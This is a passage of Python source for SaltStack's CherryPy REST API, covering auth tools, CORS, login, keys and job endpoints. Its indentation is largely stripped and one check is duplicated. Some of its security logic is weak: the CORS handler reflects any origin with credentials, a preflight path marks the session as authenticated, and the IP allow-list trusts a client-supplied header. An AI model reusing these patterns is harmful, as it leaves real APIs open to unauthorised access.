import salt.utils.versions
import salt.utils.yaml
logger = logging.getLogger(__name__)
try:
from cherrypy.lib import ( # pylint: disable=import-error,3rd-party-module-not-gated
cpstats,
)
except AttributeError:
cpstats = None
    logger.warning(
"Import of cherrypy.cpstats failed. "
"Possible upstream bug: "
"https://github.com/cherrypy/cherrypy/issues/1444"
)
except ImportError:
cpstats = None
logger.warn("Import of cherrypy.cpstats failed.")
try:
# Imports related to websocket
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type("websockets", (object,), {"SynchronizingWebsocket": None})
HAS_WEBSOCKETS = False
def html_override_tool():
"""
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
"""
apiopts = cherrypy.config["apiopts"]
request = cherrypy.request
url_blacklist = (
apiopts.get("app_path", "/app"),
apiopts.get("static_path", "/static"),
)
if "app" not in cherrypy.config["apiopts"]:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get("Accept") == "*/*":
return
try:
wants_html = cherrypy.lib.cptools.accept("text/html")
except cherrypy.HTTPError:
return
else:
if wants_html != "text/html":
return
raise cherrypy.InternalRedirect(apiopts.get("app_path", "/app"))
def salt_token_tool():
"""
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
"""
x_auth = cherrypy.request.headers.get("X-Auth-Token", None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie["session_id"] = x_auth
def salt_api_acl_tool(username, request):
"""
.. versionadded:: 2016.3.0
    Verifies user requests against the API whitelist (user/IP pairs) in order
    to provide whitelisting for the API similar to the master, but applied at
    the API layer.
    .. code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
"""
failure_str = "[api_acl] Authentication failed for " "user {0} from IP {1}"
success_str = "[api_acl] Authentication successful for user {0} from IP {1}"
pass_str = "[api_acl] Authentication not checked for " "user {0} from IP {1}"
acl = None
# Salt Configuration
salt_config = cherrypy.config.get("saltopts", None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get("rest_cherrypy", None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get("api_acl", None)
ip = request.remote.ip
if acl:
users = acl.get("users", {})
if users:
if username in users:
if ip in users[username] or "*" in users[username]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
elif username not in users and "*" in users:
if ip in users["*"] or "*" in users["*"]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(pass_str.format(username, ip))
return True
def salt_ip_verify_tool():
"""
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
"""
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get("saltopts", None)
if salt_config:
cherrypy_conf = salt_config.get("rest_cherrypy", None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get("authorized_ips", None)
if auth_ip_list:
logger.debug("Found IP list: {}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get("Remote-Addr", None)
logger.debug("Request from IP: {}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {}".format(rem_ip))
raise cherrypy.HTTPError(403, "Bad IP")
def salt_auth_tool():
"""
Redirect all unauthenticated requests to the login page
"""
# Redirect to the login page if the session hasn't been authed
if "token" not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers["Cache-Control"] = "private"
def cors_tool():
"""
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
"""
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head["Access-Control-Allow-Origin"] = req_head.get("Origin", "*")
resp_head["Access-Control-Expose-Headers"] = "GET, POST"
resp_head["Access-Control-Allow-Credentials"] = "true"
# Non-simple CORS preflight request; short-circuit the normal handler.
if cherrypy.request.method == "OPTIONS":
ac_method = req_head.get("Access-Control-Request-Method", None)
allowed_methods = ["GET", "POST"]
allowed_headers = [
"Content-Type",
"X-Auth-Token",
"X-Requested-With",
]
if ac_method and ac_method in allowed_methods:
resp_head["Access-Control-Allow-Methods"] = ", ".join(allowed_methods)
resp_head["Access-Control-Allow-Headers"] = ", ".join(allowed_headers)
resp_head["Connection"] = "keep-alive"
resp_head["Access-Control-Max-Age"] = "1400"
# Note: CherryPy on Py3 uses binary objects for the response
# Python 2.6 also supports the byte prefix, so no need for conditionals
cherrypy.response.body = b""
cherrypy.response.status = 200
# CORS requests should short-circuit the other tools.
cherrypy.serving.request.handler = None
# Needed to avoid the auth_tool check.
if cherrypy.request.config.get("tools.sessions.on", False):
cherrypy.session["token"] = True
return True
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
("application/json", salt.utils.json.dumps),
(
"application/x-yaml",
functools.partial(salt.utils.yaml.safe_dump, default_flow_style=False),
),
)
def hypermedia_handler(*args, **kwargs):
"""
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
"""
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (
salt.exceptions.AuthenticationError,
salt.exceptions.AuthorizationError,
salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError,
):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (
salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError,
) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except salt.exceptions.SaltClientTimeout:
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc: # pylint: disable=broad-except
        # The TimeoutError exception class was removed in CherryPy 12.0.0, but
        # we still check for its existence and handle it for CherryPy < 12.
        # The check was moved down from the SaltClientTimeout error line because
        # a one-line if statement there throws a BaseException inheritance TypeError.
if hasattr(cherrypy, "TimeoutError") and isinstance(exc, cherrypy.TimeoutError):
raise cherrypy.HTTPError(504)
import traceback
logger.debug(
"Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True,
)
cherrypy.response.status = 500
ret = {
"status": cherrypy.response.status,
"return": "{}".format(traceback.format_exc(exc))
if cherrypy.config["debug"]
else "An unexpected error occurred",
}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers["Content-Type"] = best
out = cherrypy.response.processors[best]
try:
response = out(ret)
return salt.utils.stringutils.to_bytes(response)
except Exception: # pylint: disable=broad-except
msg = "Could not serialize the return data from Salt."
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
"""
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
"""
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
# If handler has been explicitly set to None, don't override.
if request.handler is not None:
request.handler = hypermedia_handler
def process_request_body(fn):
"""
A decorator to skip a processor function if process_request_body is False
"""
@functools.wraps(fn)
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
"""
Accept x-www-form-urlencoded data and reformat it into a Low State
data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
"""
# cherrypy._cpreqbody.process_urlencoded doesn't preserve the raw
# "body", so we have to handle parsing the tokens using parse_qsl
urlencoded = entity.read()
try:
urlencoded = urlencoded.decode("utf-8")
except (UnicodeDecodeError, AttributeError):
pass
cherrypy.serving.request.raw_body = urlencoded
cherrypy.serving.request.unserialized_data = dict(parse_qsl(urlencoded))
@process_request_body
def json_processor(entity):
"""
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
del contents
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, "Invalid JSON document")
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
"""
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, "Invalid YAML document")
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
"""
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
"""
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
"""
# Be liberal in what you accept
ct_in_map = {
"application/x-www-form-urlencoded": urlencoded_processor,
"application/json": json_processor,
"application/x-yaml": yaml_processor,
"text/yaml": yaml_processor,
"text/plain": text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (
cherrypy.request.method.upper() == "POST"
and cherrypy.request.headers.get("Content-Length", "0") == "0"
):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, "Content type not supported"
)
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
"""
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
"""
if cherrypy.request.method.upper() != "POST":
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and isinstance(data, Mapping):
# Make the 'arg' param a list if not already
if "arg" in data and not isinstance(
data["arg"], list
): # pylint: disable=unsupported-membership-test
data["arg"] = [data["arg"]]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
tools_config = {
"on_start_resource": [
("html_override", html_override_tool),
("salt_token", salt_token_tool),
],
"before_request_body": [
("cors_tool", cors_tool),
("salt_auth", salt_auth_tool),
("hypermedia_in", hypermedia_in),
],
"before_handler": [
("lowdata_fmt", lowdata_fmt),
("hypermedia_out", hypermedia_out),
("salt_ip_verify", salt_ip_verify_tool),
],
}
for hook, tool_list in tools_config.items():
for idx, tool_config in enumerate(tool_list):
tool_name, tool_fn = tool_config
setattr(
cherrypy.tools, tool_name, cherrypy.Tool(hook, tool_fn, priority=(50 + idx))
)
###############################################################################
class LowDataAdapter:
"""
The primary entry point to Salt's REST API
"""
exposed = True
_cp_config = {
"tools.salt_token.on": True,
"tools.sessions.on": True,
"tools.sessions.timeout": 60 * 10, # 10 hours
# 'tools.autovary.on': True,
"tools.hypermedia_out.on": True,
"tools.hypermedia_in.on": True,
"tools.lowdata_fmt.on": True,
"tools.salt_ip_verify.on": True,
}
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.apiopts = cherrypy.config["apiopts"]
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
"""
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
"""
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get("tools.sessions.on", False):
cherrypy.session.release_lock()
        # If the lowstate loaded isn't a list, let's notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, "Lowstates must be a list")
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk["token"] = token
if "token" in chunk:
# Make sure that auth token is hex
try:
int(chunk["token"], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, "Invalid token")
if "token" in chunk:
# Make sure that auth token is hex
try:
int(chunk["token"], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, "Invalid token")
            if "tgt_type" in chunk:
                if chunk["tgt_type"] == "ipcidr":
                    raise cherrypy.HTTPError(401, "The ipcidr target type is not currently supported")
                if chunk["tgt_type"] == "compound" and "S@" in chunk["tgt"]:
                    raise cherrypy.HTTPError(401, "The S@ compound target is not currently supported")
            if "username" in chunk:
                username = chunk["username"]
                if not salt_api_acl_tool(username, cherrypy.request):
                    raise cherrypy.HTTPError(401)
if client:
chunk["client"] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if "arg" in chunk and not isinstance(chunk["arg"], list):
chunk["arg"] = [chunk["arg"]]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, Iterator):
yield from ret
else:
yield ret
@cherrypy.config(**{"tools.sessions.on": False})
def GET(self):
"""
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: text
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
"""
return {
"return": "Welcome",
"clients": salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
"""
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
"""
return {"return": list(self.exec_lowstate(token=cherrypy.session.get("token")))}
class Minions(LowDataAdapter):
"""
Convenience URLs for working with minions
"""
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def GET(self, mid=None): # pylint: disable=arguments-differ
"""
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: text
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
"""
cherrypy.request.lowstate = [
{"client": "local", "tgt": mid or "*", "fun": "grains.items"}
]
return {
"return": list(self.exec_lowstate(token=cherrypy.session.get("token"))),
}
def POST(self, **kwargs):
"""
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
Lowstate data describing Salt commands must be sent in the request
body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: text
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: text
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
"""
job_data = list(
self.exec_lowstate(
client="local_async", token=cherrypy.session.get("token")
)
)
cherrypy.response.status = 202
return {
"return": job_data,
"_links": {
"jobs": [{"href": "/jobs/{}".format(i["jid"])} for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def GET(self, jid=None, timeout=""): # pylint: disable=arguments-differ
"""
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: text
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: text
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
"""
lowstate = {"client": "runner"}
if jid:
lowstate.update({"fun": "jobs.list_job", "jid": jid})
else:
lowstate.update({"fun": "jobs.list_jobs"})
cherrypy.request.lowstate = [lowstate]
job_ret_info = list(self.exec_lowstate(token=cherrypy.session.get("token")))
ret = {}
if jid:
ret["info"] = [job_ret_info[0]]
minion_ret = {}
            returns = job_ret_info[0].get("Result", {})
            for minion in returns:
                minion_ret[minion] = returns[minion].get("return")
ret["return"] = [minion_ret]
else:
ret["return"] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
"""
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
"""
def GET(self, mid=None): # pylint: disable=arguments-differ
"""
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: text
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: text
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
"""
if mid:
lowstate = [{"client": "wheel", "fun": "key.finger", "match": mid}]
else:
lowstate = [{"client": "wheel", "fun": "key.list_all"}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get("token"))
return {"return": next(result, {}).get("data", {}).get("return", {})}
@cherrypy.config(**{"tools.hypermedia_out.on": False, "tools.sessions.on": False})
def POST(self, **kwargs):
r"""
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>`.
.. note:: A note about ``curl``
Avoid using the ``-i`` flag or HTTP headers will be written and
produce an invalid tar file.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: text
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
"""
lowstate = cherrypy.request.lowstate
lowstate[0].update({"client": "wheel", "fun": "key.gen_accept"})
if "mid" in lowstate[0]:
lowstate[0]["id_"] = lowstate[0].pop("mid")
result = self.exec_lowstate()
ret = next(result, {}).get("data", {}).get("return", {})
pub_key = ret.get("pub", "")
pub_key_file = tarfile.TarInfo("minion.pub")
pub_key_file.size = len(pub_key)
priv_key = ret.get("priv", "")
priv_key_file = tarfile.TarInfo("minion.pem")
priv_key_file.size = len(priv_key)
fileobj = io.BytesIO()
tarball = tarfile.open(fileobj=fileobj, mode="w")
pub_key = pub_key.encode(__salt_system_encoding__)
priv_key = priv_key.encode(__salt_system_encoding__)
tarball.addfile(pub_key_file, io.BytesIO(pub_key))
tarball.addfile(priv_key_file, io.BytesIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers[
"Content-Disposition"
] = 'attachment; filename="saltkeys-{}.tar"'.format(lowstate[0]["id_"])
headers["Content-Type"] = "application/x-tar"
headers["Content-Length"] = len(fileobj.getvalue())
headers["Cache-Control"] = "no-cache"
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
"""
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
"""
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: text
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: text/html
"""
cherrypy.response.headers["WWW-Authenticate"] = "Session"
return {
"status": cherrypy.response.status,
"return": "Please log in",
}
def POST(self, **kwargs):
"""
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
"""
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning("Salt Master is not available.")
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get("username", None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if "token" not in token:
raise cherrypy.HTTPError(
401, "Could not authenticate using provided credentials"
)
cherrypy.response.headers["X-Auth-Token"] = cherrypy.session.id
cherrypy.session["token"] = token["token"]
cherrypy.session["timeout"] = (token["expire"] - token["start"]) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get("external_auth", {}).get(token["eauth"], {})
if token["eauth"] == "django" and "^model" in eauth:
perms = token["auth_list"]
            elif token["eauth"] == "rest":
                perms = token["auth_list"]
else:
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token["name"], [])
perms.extend(eauth.get("*", []))
if "groups" in token and token["groups"]:
user_groups = set(token["groups"])
eauth_groups = {
i.rstrip("%") for i in eauth.keys() if i.endswith("%")
}
for group in user_groups & eauth_groups:
perms.extend(eauth["{}%".format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception: # pylint: disable=broad-except
logger.debug(
"Configuration for external_auth malformed for "
"eauth '{}', and user '{}'.".format(
token.get("eauth"), token.get("name")
),
exc_info=True,
)
perms = None
return {
"return": [
{
"token": cherrypy.session.id,
"expire": token["expire"],
"start": token["start"],
"user": token["name"],
"eauth": token["eauth"],
"perms": perms or {},
}
]
}
class Logout(LowDataAdapter):
"""
Class to remove or invalidate sessions
"""
_cp_config = dict(
LowDataAdapter._cp_config,
**{"tools.salt_auth.on": True, "tools.lowdata_fmt.on": False}
)
def POST(self): # pylint: disable=arguments-differ
"""
Destroy the currently active session and expire the session cookie
"""
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {"return": "Your token has been cleared"}
class Token(LowDataAdapter):
"""
Generate a Salt token from eauth credentials
Wraps functionality in the :py:mod:`auth Runner <salt.runners.auth>`.
.. versionadded:: 2017.7.0
"""
@cherrypy.config(**{"tools.sessions.on": False})
def POST(self, **kwargs):
r"""
.. http:post:: /token
Generate a Salt eauth token
:status 200: |200|
:status 400: |400|
:status 401: |401|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/token \
-H 'Content-type: application/json' \
-d '{
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}'
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
[{
"start": 1494987445.528182,
"token": "e72ca1655d05...",
"expire": 1495030645.528183,
"name": "saltdev",
"eauth": "auto"
}]
"""
for creds in cherrypy.request.lowstate:
try:
creds.update(
{
"client": "runner",
"fun": "auth.mk_token",
"kwarg": {
"username": creds["username"],
"password": creds["password"],
"eauth": creds["eauth"],
},
}
)
except KeyError:
raise cherrypy.HTTPError(
400, 'Require "username", "password", and "eauth" params'
)
return list(self.exec_lowstate())
class Run(LowDataAdapter):
"""
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`.
    salt-api does not enforce authorization; Salt's eauth system does that.
Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
**or** ``token`` kwargs that are then checked by the eauth system. The
session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
eauth token and then passes the ``token`` kwarg in automatically.
If you already have a Salt eauth token, perhaps generated by the
:py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
Runner module, then there is no reason to use sessions.
This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
**or** a ``token`` kwarg and does not make use of sessions at all.
"""
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.sessions.on": False})
def POST(self, **kwargs):
"""
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`. Otherwise, this URL is identical to the
:py:meth:`root URL (/) <LowDataAdapter.POST>`.
.. http:post:: /run
An array of lowstate data describing Salt commands must be sent in
the request body.
:status 200: |200|
:status 400: |400|
